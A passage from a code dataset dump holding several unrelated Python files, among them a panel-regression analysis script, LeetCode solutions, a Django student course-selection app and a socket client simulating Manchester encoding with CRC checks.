exog_vars = ['OSIM', \"LogFreq\", \"LogCC\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_O\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_J\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_Co\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\"]\n exog_vars = ['OSIM', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\",\"G_Co\"]\n \n exog = sm.add_constant(data[exog_vars])\n mod = PanelOLS(data.SSIM, exog, entity_effects=True, time_effects=True)\n fe_re_res = mod.fit(cov_type='clustered', cluster_entity=True, cluster_time=True)\n fe_re_pred = fe_re_res.predict()\n print(fe_re_res)\n \n # Table 5\n # 固定效应 - 双向效应\n exog_vars = ['ODIS']\n exog_vars = ['ODIS', \"LogFreq\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_O\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_J\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_Co\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\"]\n exog_vars = ['ODIS', \"LogFreq\", \"LogCC\", \"G_A\", \"G_O\", \"G_J\",\"G_Co\"]\n \n exog = sm.add_constant(data[exog_vars])\n mod = PanelOLS(data[\"SDIS\"], exog, entity_effects=True, time_effects=True)\n fe_re_res = mod.fit(cov_type='clustered', cluster_entity=True, cluster_time=True)\n fe_re_pred = fe_re_res.predict()\n print(fe_re_res)\n \n # 绘图\n plt_X = list()\n plt_Y_actual = list()\n plt_Y_pred = list()\n for fos in tqdm(Examples):\n plt_x = data.loc[fos]['OSIM']\n plt_y_acutal = data.loc[fos]['SSIM']\n plt_y_pred = fe_re_pred.loc[fos]['fitted_values']\n plt_X.append(plt_x)\n plt_Y_actual.append(plt_y_acutal)\n plt_Y_pred.append(plt_y_pred)\n plt_X = np.concatenate(plt_X)\n plt_Y_actual = np.concatenate(plt_Y_actual)\n plt_Y_pred = np.concatenate(plt_Y_pred)\n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\", # \n \"font.size\" : 20\n }\n rcParams.update(config)\n # 散点图\n plt.scatter(plt_X, plt_Y_actual, c='gray', alpha=0.1, s=1)\n plt.scatter(plt_X, plt_Y_pred, c='red', alpha=0.1, s=1, marker=\"o\")\n plt.ylabel(\"$SSIM$\")\n plt.xlabel(\"$OSIM$\")\n plt.yticks(np.arange(0.1, 0.6, 0.1))\n plt.xticks(np.arange(-0.3, 0.3, 0.1))","repo_name":"WannaLearning/Evolutions-of-Semantic-Consistency-in-Research-Topic-via-Contextualized-Word-Embedding","sub_path":"TopicEvolution_BERTVecAnalysis/Code/ExprimentsAndResults.py","file_name":"ExprimentsAndResults.py","file_ext":"py","file_size_in_byte":64320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13611462725","text":"#coding=utf-8\n\nimport queue\nimport threading\nimport time\n\nclass threadingQueue(threading.Thread):\n def __init__(self,name,q):\n threading.Thread.__init__(self);\n self.name=name;\n self.q=q;\n def run(self):\n while(True):\n #time.sleep(5);\n #print(\"%s threading start \\n\"%self.name);\n a=self.q.get();\n print('------',a,'-----\\n');\n self.q.task_done();\n \n\nif __name__=='__main__':\n data=[1,2,3,4,5,6,7,8,9,0];\n qTmp=queue.Queue();\n for i in data:\n qTmp.put(i);\n for j in range(3):\n t=threadingQueue(str(j),qTmp);\n t.setDaemon(True);\n t.start();\n qTmp.join();\n print('All Done 
!');","repo_name":"wyude/test","sub_path":"test/ThreadingQueue.py","file_name":"ThreadingQueue.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10790513525","text":"# Time: O(nlogn)\n# Space: O(n)\n\nimport collections\n\n\nclass UnionFind(object):\n def __init__(self, n):\n self.set = range(n)\n\n def find_set(self, x):\n if self.set[x] != x:\n self.set[x] = self.find_set(self.set[x]) # path compression.\n return self.set[x]\n\n def union_set(self, x, y):\n x_root, y_root = map(self.find_set, (x, y))\n if x_root == y_root:\n return False\n self.set[max(x_root, y_root)] = min(x_root, y_root)\n return True\n\n\nclass Solution(object):\n def smallestStringWithSwaps(self, s, pairs):\n \"\"\"\n :type s: str\n :type pairs: List[List[int]]\n :rtype: str\n \"\"\"\n union_find = UnionFind(len(s))\n for x,y in pairs: \n union_find.union_set(x, y)\n components = collections.defaultdict(list)\n for i in xrange(len(s)): \n components[union_find.find_set(i)].append(s[i])\n for i in components.iterkeys(): \n components[i].sort(reverse=True)\n result = []\n for i in xrange(len(s)): \n result.append(components[union_find.find_set(i)].pop())\n return \"\".join(result)\n\n\n# Time: O(nlogn)\n# Space: O(n)\nimport itertools\nclass Solution2(object):\n def smallestStringWithSwaps(self, s, pairs):\n \"\"\"\n :type s: str\n :type pairs: List[List[int]]\n :rtype: str\n \"\"\"\n def dfs(i, adj, lookup, component):\n lookup.add(i)\n component.append(i)\n for j in adj[i]:\n if j in lookup:\n continue\n dfs(j, adj, lookup, component)\n \n adj = collections.defaultdict(list)\n for i, j in pairs:\n adj[i].append(j)\n adj[j].append(i)\n lookup = set()\n result = list(s)\n for i in xrange(len(s)):\n if i in lookup:\n continue\n component = []\n dfs(i, adj, lookup, component)\n component.sort()\n chars = sorted(result[k] for k in component)\n for comp, char in itertools.izip(component, chars):\n result[comp] = char\n return \"\".join(result)\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/smallest-string-with-swaps.py","file_name":"smallest-string-with-swaps.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"19734163655","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \n if not headA or not headB:\n return None\n \n curr1, curr2 = headA, headB\n while curr1 and curr2 and curr1 != curr2:\n curr1 = curr1.next\n curr2 = curr2.next\n if curr1 == curr2:\n return curr1\n if not curr1:\n curr1 = headB\n if not curr2:\n curr2 = headA\n \n return curr1\n","repo_name":"palashsharma891/LeetCode-Learn-Cards","sub_path":"2. Linked List/2. 
Two Pointer Technique/Intersection of Two Linked Lists.py","file_name":"Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1261745506","text":"from ByteStream.Reader import Reader\nfrom Protocol.Messages.Server.TeamMessage import TeamMessage\nfrom Logic.Home.LogicEventData import LogicEventData\n\nclass TeamCreateMessage(Reader):\n def __init__(self, client, player, initial_bytes):\n super().__init__(initial_bytes)\n self.player = player\n self.client = client\n\n def decode(self):\n self.map_slot = self.readVInt()\n self.map_id = self.readVInt()\n self.room_type = self.readVInt()\n\n def process(self, db):\n if self.map_slot != -64:\n self.player.map_id = LogicEventData.events[self.map_slot - 1]['ID']\n else:\n self.player.map_id = 7\n\n TeamMessage(self.client, self.player).send()","repo_name":"PhoenixFire6934/Classic-Brawl","sub_path":"Protocol/Messages/Client/TeamCreateMessage.py","file_name":"TeamCreateMessage.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"40"} +{"seq_id":"3185802823","text":"#encoding=utf-8\nfrom django.shortcuts import render\n\nfrom django.http import HttpResponse\nfrom .models import Users , Userinfo, Courseinfo, Teacherinfo, TeacherCourse, StudentCourse, Department_College, Classtime, \\\n Classroom, Params\nfrom django.shortcuts import redirect\nimport json\nfrom urllib.parse import unquote\n\n# Create your views here.\n\ndef homepage(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n user = Users.objects.get(username = cook)\n if user.customertype == 0:\n return render(request, 'homepage.html')\n elif user.customertype == 1:\n return render(request, 'homepage_t.html')\n\ndef selectsubject(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'selectsubject.html')\n\ndef modifypwd(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'modifypwd.html')\n\ndef do_modifypwd(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n username = request.session.get('username')\n old_password = request.GET.get('old_password')\n new_password = request.GET.get('new_password')\n try:\n account = Users.objects.get(username=username)\n except:\n return HttpResponse('用户名密码不存在。')\n if account.password != old_password:\n return HttpResponse('原密码输入错误。')\n elif old_password == new_password:\n return HttpResponse('原密码和新密码不能相同。')\n else:\n Users.objects.filter(username=username).update(password=new_password) # update可多条\n return HttpResponse('密码修改成功!')\n\n\n\ndef studentinfo(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n user = Users.objects.get(username = cook)\n if user.customertype == 0:\n userinfo = Userinfo.objects.get(user_username=cook) # update可多条\n dep = Department_College.objects.get(departmentnumber=userinfo.user_department)\n userinfo.user_department = dep.departmentname\n userinfo.user_college = dep.collegename\n return render(request, 'studentinfo.html', {'userinfo':userinfo})\n elif 
user.customertype == 1:\n userinfo = Teacherinfo.objects.get(teacher_username=cook)\n dep = Department_College.objects.get(departmentnumber=userinfo.teacher_faculty)\n userinfo.teacher_faculty = dep.departmentname + dep.collegename\n return render(request, 'teacherinfo.html', {'userinfo':userinfo})\n\ndef studentinfo_update(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n user = Users.objects.get(username = cook)\n if user.customertype == 0:\n userinfo = Userinfo.objects.get(user_username=cook) # update可多条\n dep = Department_College.objects.get(departmentnumber=userinfo.user_department)\n userinfo.user_department = dep.departmentname\n userinfo.user_college = dep.collegename\n return render(request, 'studentinfo_update.html', {'userinfo':userinfo})\n elif user.customertype == 1:\n userinfo = Teacherinfo.objects.get(teacher_username=cook)\n dep = Department_College.objects.get(departmentnumber=userinfo.teacher_faculty)\n userinfo.teacher_faculty = dep.departmentname + dep.collegename\n return render(request, 'teacherinfo_update.html', {'userinfo':userinfo})\n\ndef studentinfo_update_save(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n try:\n username = request.GET.get('username')\n phone = request.GET.get('phone')\n adress = request.GET.get('adress')\n print(username, phone, adress)\n user = Users.objects.get(username=cook)\n if user.customertype == 0:\n Userinfo.objects.filter(user_username=username).update(user_phone=phone, user_adress=adress) # update可多条\n elif user.customertype == 1:\n Teacherinfo.objects.filter(teacher_username = username).update(teacher_phone=phone, teacher_adress=adress)\n return HttpResponse('修改成功!')\n except:\n return HttpResponse('修改数据异常!')\n\n\ndef classschedule(request):\n cook = request.COOKIES.get('username')\n if cook == None:\n return render(request, 'login.html')\n print('cook:', cook)\n user = Users.objects.get(username=cook)\n if user.customertype == 0:\n return render(request, 'classschedule.html')\n elif user.customertype == 1:\n return render(request, 'teacher_classschedule.html')\n\ndef get_classschedule(request):\n def get_time_place(data):\n time = []\n place = []\n res1 = data.split(';')\n for res2 in res1:\n res3 = res2.split('|')\n res4 = res3[0].split(',')\n tag = 0\n for t in res4:\n time.append(t)\n\n place.append(res3[1])\n return time, place\n\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n one = {}\n two = {}\n three = {}\n four = {}\n five = {}\n six = {}\n seven = {}\n eight = {}\n nine = {}\n ten = {}\n eleven = {}\n\n param = Params.objects.get(param='term')\n user = Users.objects.get(username=cook)\n if user.customertype == 0:\n studentcourses = StudentCourse.objects.filter(student_username = cook,term_now=param.term_now, tag=param.tag)\n elif user.customertype == 1:\n studentcourses = TeacherCourse.objects.filter(course_teacher_username = cook,\n term=param.term_now, tag=param.tag)\n for studentcourse in studentcourses:\n if user.customertype == 0:\n course = TeacherCourse.objects.get(course_teacher_username = studentcourse.teacher_username,\n course_code = studentcourse.course_code, term=param.term_now, tag=param.tag)\n elif user.customertype == 1:\n course = studentcourse\n times, places= get_time_place(course.course_classtime)\n courseinfo = Courseinfo.objects.get(course_code = 
course.course_code)\n for time in times:\n classtime = Classtime.objects.get(num=time)\n place = Classroom.objects.get(classroomnum = places[0])\n am = {}\n\n if classtime.weekday == '周一':\n am['Mon'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周二':\n am['Tues'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周三':\n am['Wed'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周四':\n am['Thur'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周五':\n am['Fri'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周六':\n am['Satu'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周日':\n am['Sun'] = courseinfo.course_name+'('+ place.classroomname +')'\n\n if classtime.classnum == '第一节课':\n one.update(am)\n elif classtime.classnum == '第二节课':\n two.update(am)\n elif classtime.classnum == '第三节课':\n three.update(am)\n elif classtime.classnum == '第四节课':\n four.update(am)\n elif classtime.classnum == '第五节课':\n five.update(am)\n elif classtime.classnum == '第六节课':\n six.update(am)\n elif classtime.classnum == '第七节课':\n seven.update(am)\n elif classtime.classnum == '第八节课':\n eight.update(am)\n elif classtime.classnum == '第九节课':\n nine.update(am)\n elif classtime.classnum == '第十节课':\n ten.update(am)\n elif classtime.classnum == '第十一节课':\n eleven.update(am)\n\n schedule1 = []\n schedule1.append(one)\n schedule1.append(two)\n schedule1.append(three)\n schedule1.append(four)\n schedule1.append(five)\n schedule1.append(six)\n schedule1.append(seven)\n schedule1.append(eight)\n schedule1.append(nine)\n schedule1.append(ten)\n schedule1.append(eleven)\n schedule = {}\n schedule['rows'] = schedule1\n schedule = json.dumps(schedule)\n return HttpResponse(schedule, content_type='application/json')\n\n\ndef selsubnotice(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n return render(request, 'selsubnotice.html')\n\ndef selsubhelp(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'selsubhelp.html')\n\ndef gradecheck(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n param = Params.objects.get(param = 'term')\n userinfo = Userinfo.objects.get(user_username = cook)\n yearnum = int(param.term_now) - int(userinfo.user_grade)\n term = []\n for i in range(yearnum+1):\n if i == 0:\n term.append(str(int(userinfo.user_grade) + i) + '年~'+ str(int(userinfo.user_grade) + i + 1) +'第一学期')\n else:\n if i == yearnum:\n if param.tag == 0:\n term.append(str(int(userinfo.user_grade) + i - 1) + '年~'+ str(int(userinfo.user_grade)+i) + '第二学期')\n else:\n term.append(str(int(userinfo.user_grade) + i - 1) + '年~'+ str(int(userinfo.user_grade)+i) + '第二学期')\n term.append(str(int(userinfo.user_grade) + i) + '年~'+ str(int(userinfo.user_grade) + i + 1) +'第一学期')\n else:\n term.append(str(int(userinfo.user_grade) + i - 1) + '年~'+ str(int(userinfo.user_grade)+i) + '第二学期')\n term.append(str(int(userinfo.user_grade) + i) + '年~'+ str(int(userinfo.user_grade) + i + 1) +'第一学期')\n num = len(term)\n return render(request, 'gradecheck.html', {'term': json.dumps(term)})\n\n\ndef login(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n return render(request, 'login.html')\n\ndef login_check(request):\n try:\n 
regResponse = {\"errorCode\": 0, \"errorsList\": ''}\n username = request.GET.get('username')\n password = request.GET.get('password')\n if (username == '') or (password == ''):\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '用户名或密码不能为空。'\n return HttpResponse(json.dumps(regResponse))\n try:\n account = Users.objects.get(username=username)\n # account = ue.objects.all()\n except:\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '用户名密码不存在。'\n return HttpResponse(json.dumps(regResponse))\n if account == None:\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '用户名不存在。'\n return HttpResponse(json.dumps(regResponse))\n elif password != account.password:\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '密码错误。'\n return HttpResponse(json.dumps(regResponse))\n elif (account.customertype ==0) or (account.customertype ==1):\n response = HttpResponse(json.dumps(regResponse))\n response.set_cookie(\"username\", username)\n request.session['is_login'] = 'true'\n request.session['username'] = username\n return response\n\n except:\n return HttpResponse('登录异常。')\n\n\ndef getcourse(request):\n def get_time_place(data):\n res = ''\n res1 = data.split(';')\n for res2 in res1:\n res3 = res2.split('|')\n res4 = res3[0].split(',')\n tag = 0\n for t in res4:\n cla = Classtime.objects.get(num=str(t))\n if tag == 0:\n res = res + cla.weekday + cla.classnum\n tag+=1\n else:\n res = res + cla.classnum\n\n classroom = Classroom.objects.get(classroomnum=res3[1])\n res = res + '(' + classroom.classroomname + ');'\n\n return res\n\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n\n cou = []\n account = Userinfo.objects.get(user_username=cook)\n department = account.user_department\n college = account.user_college\n print(department, ' ', college)\n\n teachercourses = TeacherCourse.objects.filter(course_to_department=department, course_to_college=college)\n for teachercourse in teachercourses:\n course = Courseinfo.objects.get(course_code=teachercourse.course_code)\n teacher = Teacherinfo.objects.get(teacher_username=teachercourse.course_teacher_username)\n isCheck = StudentCourse.objects.filter(course_code = course.course_code, student_username=cook,\n teacher_username = teacher.teacher_username)\n\n\n if isCheck:\n check = '删除'\n else:\n check = '选择'\n cou.append({\n 'name': course.course_name,\n 'nameid': course.course_code,\n 'namexh': course.course_number,\n 'teacher': teacher.teacher_name,\n 'teacher_username': teacher.teacher_username,\n 'namelex': course.course_attribute,\n 'gradelex': teachercourse.course_examtype,\n 'place': get_time_place(teachercourse.course_classtime),\n 'week': teachercourse.course_classweek,\n 'select': check,\n })\n return HttpResponse(json.dumps(cou), content_type=\"application/json\")\n\ndef selectsubject_action(request):\n try:\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n data = request.POST.get('data')\n action = request.POST.get('action')\n data = unquote(data)\n data = json.loads(data)\n teacher_username = data['teacher_username']\n course_code = data['nameid']\n student_username = cook\n param = Params.objects.get(param = 'term')\n if action == 'select':\n isCheck = StudentCourse.objects.filter(course_code=course_code, exam_num = 1, term_now = param.term_now, tag = param.tag)\n if isCheck:\n return HttpResponse(json.dumps({'rescode': '0', 'res': '已选择该门课程,请选择其他课程。'}))\n 
StudentCourse.objects.create(course_code=course_code, student_username=student_username,\n teacher_username=teacher_username, term_now = param.term_now, tag = param.tag)\n return HttpResponse(json.dumps({'rescode': '1', 'res': '选课成功。'}))\n else:\n StudentCourse.objects.filter(course_code=course_code, student_username=student_username,\n teacher_username=teacher_username, exam_num = 1, term_now = param.term_now, tag = param.tag).delete()\n return HttpResponse(json.dumps({'rescode': '1', 'res': '删除成功。'}))\n except:\n return HttpResponse(json.dumps({'rescode': '1', 'res': '操作异常,请重新选择。'}))\n\n\n\ndef gradecheck_get(request):\n text = request.GET.get('text')\n year = text[:4]\n if '一' in text:\n tag = 1\n else:\n year = str(int(year) + 1)\n tag = 0\n studentcourse = StudentCourse.objects.filter(term_now = year, tag = tag)\n if studentcourse == None:\n return HttpResponse('未查询到数据。')\n else:\n cou = []\n for i in studentcourse:\n course = Courseinfo.objects.get(course_code = i.course_code)\n if i.ispass == 0:\n res = '尚未评定'\n elif i.ispass == 1:\n res = '通过'\n else:\n res = '未通过'\n cou.append({\n 'name': course.course_name,\n 'grade': i.course_grade,\n 'pass': res,\n })\n return HttpResponse(json.dumps(cou), content_type=\"application/json\")\n\n\ndef studyagain(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'studyagain.html')\n\n\n\ndef teacher_courseinfo(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n param = Params.objects.get(param = 'term')\n teachercourses = TeacherCourse.objects.filter(course_teacher_username = cook,term = param.term_now, tag=param.tag)\n course = []\n stu = []\n for teachercourse in teachercourses:\n cou = Courseinfo.objects.get(course_code=teachercourse.course_code)\n course.append({\n 'code': cou.course_code,\n 'name': cou.course_name,\n })\n\n return render(request, 'teacher_courseinfo.html', {'course': json.dumps(course)})\n\ndef getteacher_course(request):\n code = request.GET.get('code')\n text = request.GET.get('text')\n param = Params.objects.get(param='term')\n stus = StudentCourse.objects.filter(course_code=code,term_now = param.term_now, tag=param.tag)\n student = []\n for stu in stus:\n stuinfo = Userinfo.objects.get(user_username = stu.student_username)\n if stu.course_grade == 0:\n grade = ''\n else:\n grade = stu.course_grade\n if stu.ispass == 0:\n ispass = ''\n elif stu.ispass == 1:\n ispass = '通过'\n else:\n ispass = '未通过'\n student.append({\n 'id': stuinfo.user_username,\n 'name': stuinfo.user_name,\n 'coursename': text,\n 'grade': grade,\n 'pass':ispass,\n 'edit': '编辑',\n })\n return HttpResponse(json.dumps(student), content_type='application/json')\n\n\ndef save_studentgrade(request):\n xh = request.GET.get('xh')\n courseid = request.GET.get('courseid')\n grade = request.GET.get('grade')\n if grade == '':\n grade = 0\n else:\n grade = float(grade)\n ispass = int(request.GET.get('ispass', 0))\n try:\n param = Params.objects.get(param = 'term')\n StudentCourse.objects.filter(student_username=xh, course_code=courseid,\n term_now = param.term_now, tag=param.tag).update(course_grade=grade, ispass=ispass)\n return HttpResponse('保存成功。')\n except:\n return 
HttpResponse('保存失败,请重新录入。')\n\n\n\n\n\n\n","repo_name":"SmallRedHXB/django-python-","sub_path":"Mypage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37583699009","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 2 01:46:07 2019\r\n\r\n@author: Shashwat Kathuria\r\n\"\"\"\r\n\r\n# Client Side Program\r\n# Physical Layer and Data Link Layer Implementation\r\n\r\n# Importing socket library for socket programming\r\nimport socket, random\r\nimport pylab as plt\r\n\r\ndef main():\r\n\r\n # Getting required input\r\n generator = raw_input(\"Enter the generator function in 0s and 1s : \")\r\n finalDecodedMessage = \"\"\r\n while True:\r\n\r\n # Configuration for socket\r\n s = socket.socket()\r\n port = 9999\r\n try:\r\n # Connecting\r\n s.connect((\"127.0.0.1\", port))\r\n except:\r\n break\r\n # Getting received message from server\r\n receivedMessage = s.recv(1024).decode()\r\n\r\n # Decoding message from Physical Layer which itself takes help from\r\n # Data Link Layer for error detection\r\n physicalLayer = PhysicalLayer(receivedMessage)\r\n decodedMessage = physicalLayer.decode(generator)\r\n\r\n # Printing Answer\r\n if decodedMessage != None:\r\n print(\"\\nDecoded Frame Message : \" + str(decodedMessage))\r\n finalDecodedMessage += str(decodedMessage)\r\n else:\r\n print(\"\\nError detected in data by CRC (Cyclic Redundancy Check).\")\r\n\r\n # Plotting and showing encodings through graphs\r\n physicalLayer.plotManchesterEncoding()\r\n physicalLayer.plotOriginalEncoding()\r\n # Closing connection\r\n s.close()\r\n print(\"--------------------------------------\")\r\n # Printing final answer\r\n print(\"\\nFinal Decoded Message : \" + str(finalDecodedMessage))\r\n print(\"--------------------------------------\")\r\n\r\n\r\nclass PhysicalLayer():\r\n\r\n def __init__(self, bits):\r\n \"\"\"Function to initialize Physical Layer Object.\"\"\"\r\n\r\n self.message = \"\"\r\n self.bits = bits\r\n self.decodedMessage = \"\"\r\n self.time = list(range(len(self.bits)))\r\n self.manchesterEncoding = bits\r\n self.manchesterYVal = []\r\n self.originalYVal = []\r\n\r\n def decode(self, generator):\r\n \"\"\"Function to decode data using Manchester Encoding.\r\n Generator variable used to pass onto Data Link Layer Object.\"\"\"\r\n\r\n # Variable to keep track of decoded part of Manchester Encoding\r\n temp = \"\"\r\n print(\"\\nManchester Encoding : \\n\" + str(self.bits))\r\n\r\n # Getting values for manchester encoding graph plot\r\n yVal = [int(x) for x in list(self.bits)]\r\n temp = []\r\n for val in yVal:\r\n if val == 0:\r\n temp.append(-1)\r\n else:\r\n temp.append(1)\r\n yVal = temp\r\n self.manchesterYVal = yVal\r\n\r\n temp = \"\"\r\n # Decoding Manchester encoding in pairs\r\n for i in range(0, len(self.bits), 2):\r\n # Getting bits pair\r\n s = self.bits[i: i + 2]\r\n # If Low High then 1\r\n if s == \"01\":\r\n temp += \"1\"\r\n # If High Low then 0\r\n elif s == \"10\":\r\n temp += \"0\"\r\n\r\n # Storing answer\r\n self.bits = temp\r\n\r\n # Getting values for original encoding graph plot\r\n tempOriginalYVal = [int(x) for x in self.bits]\r\n for y in tempOriginalYVal:\r\n self.originalYVal.append(y)\r\n self.originalYVal.append(y)\r\n\r\n # Decoded to original encoding with CRC Remainder\r\n print(\"\\nOriginal Encoding With CRC Remainder : \\n\" + str(self.bits))\r\n\r\n choice = raw_input(\"\\nDo you deliberately want to 
introduce errors into the frame signal to check the program?Press 1 for yes else give any other input : \")\r\n\r\n # Introducing Errors Deliberately if choice is 1\r\n if choice == \"1\":\r\n temp = list(self.bits)\r\n # For 5 iterations\r\n for i in range(5):\r\n index = random.randint(0, len(self.bits) - 1)\r\n if temp[index] == \"0\":\r\n temp[index] = \"1\"\r\n elif temp[index] == \"1\":\r\n temp[index] = \"0\"\r\n\r\n self.bits = \"\".join(temp)\r\n\r\n print(\"\\nOriginal Encoding With CRC Remainder After Introducing Deliberate Errors : \\n\" + str(self.bits))\r\n\r\n # Getting checksum\r\n CRCchecksum = DataLinkLayer(self.bits, generator).CRCdetectError()\r\n\r\n # Printing checksum\r\n print(\"\\nCRC Remainder : \\n\" + str(CRCchecksum))\r\n\r\n # Checking further cases\r\n if CRCchecksum == '0' * (len(generator) - 1):\r\n self.bits = self.bits[:-(len(generator) - 1)]\r\n # Error case\r\n if len(self.bits) % 8 != 0:\r\n print(\"\\nError detected in data. Number of bits not a multiple of 8.\\n\")\r\n return None\r\n # Correct case\r\n else:\r\n print(\"\\nNo Error.\")\r\n print(\"\\nOriginal Encoding Without CRC Remainder : \\n\" + str(self.bits))\r\n return self.bitsToString()\r\n # Error case\r\n else:\r\n print(\"\\nError detected in data. CRC Remainder is not equal to \" + str('0' * (len(generator) - 1)))\r\n return None\r\n\r\n\r\n def bitsToString(self):\r\n \"\"\"Function to convert a stream of bits into string using ascii and bit values.\"\"\"\r\n\r\n # Lists to store bits and chars\r\n chars = []\r\n bitsArray = []\r\n\r\n # Storing all bits in an array\r\n for i in self.bits:\r\n bitsArray.append(int(i))\r\n\r\n # Converting 8 bits (each byte) into a char\r\n for b in range(len(bitsArray) // 8):\r\n\r\n # Getting 8 bits/a byte\r\n byte = bitsArray[b*8:(b+1)*8]\r\n # Converting to a char and then appending to list of chars\r\n # Base 2 for bit\r\n chars.append(chr(int(''.join([str(bit) for bit in byte]), 2)))\r\n\r\n # Concatenating chars and storing\r\n self.decodedMessage = ''.join(chars)\r\n\r\n # Returning answer\r\n return self.decodedMessage\r\n\r\n def plotManchesterEncoding(self):\r\n \"\"\"Function to plot Manchester Encoding.\"\"\"\r\n\r\n # Plotting and configuring the graph\r\n plt.figure(\"Graph\")\r\n plt.title(\"Manchester Encoding\")\r\n plt.clf()\r\n plt.xlim(0, len(self.time))\r\n plt.xlabel(\"Time || Manchester Encoding\")\r\n plt.ylabel(\"Encoding Value\")\r\n plt.plot(self.time, self.manchesterYVal, drawstyle='steps-post')\r\n plt.show()\r\n\r\n def plotOriginalEncoding(self):\r\n \"\"\"Function to plot Original Encoding.\"\"\"\r\n\r\n # Plotting and configuring the graph\r\n plt.figure(\"Graph\")\r\n plt.title(\"Original Encoding\")\r\n plt.clf()\r\n plt.xlim(0, len(self.time))\r\n plt.xlabel(\"Time || Original Encoding\")\r\n plt.ylabel(\"Encoding Value\")\r\n plt.plot(self.time, self.originalYVal, drawstyle='steps-post')\r\n plt.show()\r\n\r\nclass DataLinkLayer():\r\n def __init__(self, bits, generator):\r\n \"\"\"Function to initialize Data Link Layer Object.\"\"\"\r\n\r\n self.bits = bits\r\n self.keyLength = len(generator)\r\n self.appendedData = self.bits + \"0\" * (self.keyLength - 1)\r\n self.generator = generator\r\n\r\n def CRCdetectError(self):\r\n \"\"\"Function to encode data using CRC(Cyclic Redundancy Checksum).\"\"\"\r\n\r\n divisor = self.generator\r\n divident = self.appendedData\r\n\r\n # Number of bits to be xored\r\n numBits = len(self.generator)\r\n\r\n # Subpart substring\r\n subpartSubstring = self.appendedData[0 : 
